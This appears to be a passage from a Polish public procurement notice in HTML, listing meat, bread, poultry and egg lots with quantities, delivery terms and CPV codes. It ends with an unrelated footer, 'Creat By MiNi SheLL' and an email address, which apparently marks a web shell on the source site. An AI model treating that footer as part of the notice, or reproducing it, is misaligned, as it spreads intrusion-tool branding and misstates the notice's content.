2.	Dostawa towarów określonych w pozycji 2 do 28 - dostawa nie częściej niż dwa razy w tygodniu w dni robocze od 8:00 - 12:00.
3.	Realizacja zamówienia w dniu następującym po dniu złożenia zamówienia.
4.	Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz. U. 06.17, poz. 127 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO I WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć  nr 2 - MIĘSO I WĘDLINY
LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Schab bez kości 	1.100 kg
2.	Karczek wieprzowy z kością	100kg
3.	Łopatka wieprzowa z kością bez skóry	750 kg
4.	Żeberka wieprzowe paski	40kg
5.	Szynka wieprzowa bez kości 	400 kg
6. 	Wołowina udziec bez kości 	2400 kg
7.	Wołowina z kością rozbratel	70kg
8.	Kości schabowe 	1300 kg
9.	Wątróbka wieprzowa	50kg
10.	Słonina bez skóry	240 kg
11.	Smalec	130 kg
12. 	Boczek wędzony 	60 kg
13. 	Kiełbasa toruńska 	190 kg
14. 	Schab pieczony 	10kg
15.	Parówki wieprzowe	260 kg
16. 	Kiełbasa krakowska wieprzowa 	480 kg
17.	Mortadela	200 kg
18. 	Kiełbasa szynkowa wieprzowa 	670 kg
19.	Baleron wieprzowy	120 kg
20. 	Szynka delikatesowa	530 kg
21.	Mielonka tyrolska	30 kg
22.	Szynka prasowana	600 kg
23.	Pieczeń rzymska	30 kg
24.	Szynka wiejska	360 kg
25.	Parówki jedynki 	500 szt.
26.	Kiełbasa zwyczajna	70 kg.

Warunki dostaw:
1.	Dostawy 2 razy w tygodniu w dni robocze, w godzinach od 8:00 do 12:00.
2.	Do każdej dostawy, na każdą partię produktu Wykonawca dołączy:
a)	Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).
b)	Etykietę zawierającą minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.10.00-9, 15.11.11.00-0, 15.11.30.00-3, 15.11.40.00-0, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 3 - PIECZYWO

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Bułka pszenna - wrocławska/ gryzka  0, 35 - 0,45 kg	15.200 kg
2.	Chleb cały 0,50 - 0,60 kg	8.400 kg
3.	Bułki zwykłe 0,09 - 0,10 kg	14.800 szt.
4.	Bułka tarta, wielkość opakowania jednostkowego max - 1 kg	350 kg.
5.	Drożdżówki z serem, makiem, budyniem, jabłkiem, dżemem 0,08- 0,10 kg	1000 szt.
6. 	Pączki z nadzieniem 0,08-0,10 kg	550 szt.
7.	Groszek ptysiowy drobny	1 kg
8.	Bułka hamburger 0,09 - 0,11 kg 	380 szt.
9.	Bułka hot - dog 0,09 - 0,11 kg	380 szt.
10.	Suchary 	70 kg
11.	Jagodzianki 0,09 - 0,11 kg	840 szt.
12. 	Bułki grahamki 0,05 - 0,06 kg	600 szt.
13. 	Bułki zwykłe 0,05 - 0,06 kg	600 szt.
14. 	Chleb pełnoziarnisty 0,40 - 0,55 kg	240 szt.
15.	Chleb razowy 0,40 - 0,55 kg	240 szt.
16. 	Chleb ze słonecznikiem 0,40 - 0,55 kg	120 szt.
17.	Bułka ziołowa 0,08 - 0,11 kg	600 szt.

Warunki dostawy:
a)	Towar określony w poz. 1,2,3 - dostawa od poniedziałku do soboty (włącznie) w godzinach 5:00 - 6:00.
b)	Towar określony w poz. 4-17 - dostawa w zależności od potrzeb w dniu następującym po dniu złożenia zamówienia w godz. 5:00 - 7:00 w dni robocze od poniedziałku do piątku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PRODUKTY DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 4 - PRODUKTY DROBIOWE

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Kurczaki	5.300 kg
2.	Filet z piersi - kurczaka	1200 kg
3.	Udziec indyczy	1100 kg
4.	Udka z kurczaka	60kg
5.	Skrzydełka z kurczaka	10 kg
6. 	Filet z indyka 	15 kg
7.	Wątróbka drobiowa	120 kg
8.	Żołądki z kurczaka	35 kg
9.	Serca drobiowe	60 kg
10.	Polędwica drobiowa	300 kg
11.	Parówki drobiowe	50 kg
12. 	Krakowska drobiowa	150 kg
13. 	Pasztet drobiowy	300 kg
14. 	Baton drobiowy	110 kg

Warunki dostawy:
1.	Dostawa - 2 razy w tygodniu.
2.	Realizacja zamówienia w dniu następującym po dniu złożenia zamówienia
3.	Do każdej dostawy, na każdą partię produktu Wykonawca dołączy:
a)	 Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).
b)	Etykietę zawierającą minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.21.30-6, 15.11.23.00-9, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć  nr 5 - JAJA

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Jaja świeże wielkość - L	30.000 szt.

Warunki dostawy:
1.	Dostawa jeden raz w tygodniu.
2.	Realizacja zamówienia w dniu następującym po dniu złożenia zamówienia.
3.	Do każdej dostawy, Wykonawca dołączy:
a)	Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).
b)	Etykietę zawierającą minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com